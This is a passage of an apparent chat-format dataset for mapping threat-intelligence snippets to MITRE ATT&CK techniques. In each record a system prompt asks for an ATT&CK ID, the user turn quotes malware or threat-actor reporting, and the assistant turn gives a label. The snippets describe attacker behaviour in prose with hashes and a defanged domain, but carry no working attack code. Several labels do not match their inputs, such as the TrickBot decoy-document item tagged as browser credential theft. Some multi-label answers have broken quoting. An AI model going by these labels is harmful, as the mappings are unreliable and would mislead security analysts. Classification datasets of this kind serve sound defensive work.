- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2. The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3. The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1106 - Native API', 'T1036 - Masquerading', 'T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS"
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of Dtrack can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has used tools to download malicious code."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates new services to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server. The first byte of the string is used as the XOR key to in turn decode the remainder of the data"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 has modules for enumerating domain trusts."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ can collect the username from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of deleting Registry keys used for persistence."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has the ability to download files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 Table 5"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 uses a custom packing algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot can download additional files onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can run \"upload\" to decrypt and upload files from storage."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In both cases, Group5 disguised the malicious binaries with several layers of obfuscation, including crypting and packing to reduce the possibility of detection by antivirus software"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TYPEFRAME variants can add malicious DLL modules as new services.TYPEFRAME can also delete services from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim’s machine. Execute the command"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBALL has the ability to download and install a remote payload."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses scripts to enumerate IP ranges on the victim network. has also issued the command net view /domain to a implant to gather information about remote systems on the network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has attempted to lure victims into opening malicious links embedded in emails."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "connects to C2 infrastructure and establishes backdoors over a custom communications protocol."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active"
- },
- {
- "role": "assistant",
- "content": "T1568 - Dynamic Resolution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In Figure 9, below, red indicates targeted IP addresses, malware, registrant information, and domains associated with the targeted attack campaign while blue indicates criminal attack IP addresses, malware used, registrant information, and domains: Figure 9"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NewBCtestDll, NewBCtestnDll Module that is a reverse proxy and is able to execute commands. Module that is a reverse proxy and is able to execute commands. vncDll Module used as a RAT on the victim machine. Module used as a RAT on the victim machine. vpnDll Module used to create VPN proxy routed to a given address. Module used to create VPN proxy routed to a given address. rdpscanDll Module used for brute forcing RDP on a certain list of targets. Module used for brute forcing RDP on a certain list of targets. bcClientDllTestTest An old module used to proxy Trickbot operator traffic through a victim machine. An old module used to proxy Trickbot operator traffic through a victim machine"
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware encrypts C2 traffic using RC4 with a hard-coded key."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets."
- },
- {
- "role": "assistant",
- "content": "T1578.002 - Create Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This indicates that a human operative was executing commands on a command line style interface, rather than an automated or GUI process"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis used the \"IsDebuggerPresent\", \"OutputDebugString\", and \"SetLastError\" APIs to avoid debugging. Denis used \"GetProcAddress\" and \"LoadLibrary\" to dynamically resolve APIs. Denis also used the \"Wow64SetThreadContext\" API as part of a process hollowing process."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Bumblebee loader can support the `Dij` command which gives it the ability to inject DLLs into the memory of other processes."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The 'ssonsvr.exe' file is a legitimate Citrix executable that will be used to sideload the malicious ‘pnipcn.dll’ file"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo queries the registry to look for information about Terminal Services."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the computer name, OS versioning information, and OS install date and sends the information to the C2."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has created Windows tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dust Storm has used Android backdoors capable of enumerating specific files on the infected devices."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting."
- },
- {
- "role": "assistant",
- "content": "T1591.004 - Identify Roles"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer performs thread execution hijacking to inject its orchestrator into a running thread from a remote process."
- },
- {
- "role": "assistant",
- "content": "T1055.003 - Thread Execution Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has created social media accounts to monitor news and security trends as well as potential targets."
- },
- {
- "role": "assistant",
- "content": "T1585.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware launches another thread that scans for new drives attached to the system every three seconds. If a new drive is attached to the system and is not identified as a type CDROM drive, the malware begins the encryption process on the new drive. On new drives attached to the system, the malware may create the directory <Drive_letter>:\\$RECYCLE and execute the following command"
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use the latest attack patterns, Kubernetes (K8s) or Docker API targeting, which were featured in two reports focusing on TeamTNT operations, Black-T: New Cryptojacking Variant from TeamTNT and Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell has a module to use a rootkit on a system."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has a command to delete a Registry key it uses, \"\\Software\\Microsoft\\Internet Explorer\\notes\"."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download additional files and payloads to compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus has encoded C2 communications in Base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Icons were often folders, meant to trick targets into thinking they were opening a shortcut to a folder"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MiniDuke can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi utilizes scheduled tasks as a persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has used Cobalt Strike to empty log files."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has used EarthWorm for network tunneling with a SOCKS5 server and port transfer functionalities."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to remove indicators of compromise from tools."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern: [a-z][a-z][a-z].stage.14919005.www1.proslr3[.]com VBScript #2 “mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files: \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777638.60220156.ini \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777688.78384945.ps1 \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776b5.64953395.txt \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f7776e0.72726761.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777716.48248237.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\58d2a83f777788.86541308.vbs \\Intel\\{BFF4219E-C7D1-2880-AE58-9C9CD9701C90}\\Foxconn.lnk This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has used spear phishing to initially compromise victims."
- },
- {
- "role": "assistant",
- "content": "T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, once infected, the malware cycles through a large list of command and control (C&C) servers embedded within the malware. It appears while the list is extensive, not all of the C&Cs are active and continue to beacon until a successful connection is established. Despite modifying a small part of itself while copying itself across the network as a means to evade detection, the operators have made no effort to change the C&C communication protocol since its first inception"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Word document delivering prompts the user to enable macro execution."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk uses VMProtect to make reverse engineering the malware more difficult."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has run encoded commands from the command line."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuditCred is installed as a new service on the system."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "binds and listens on port 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
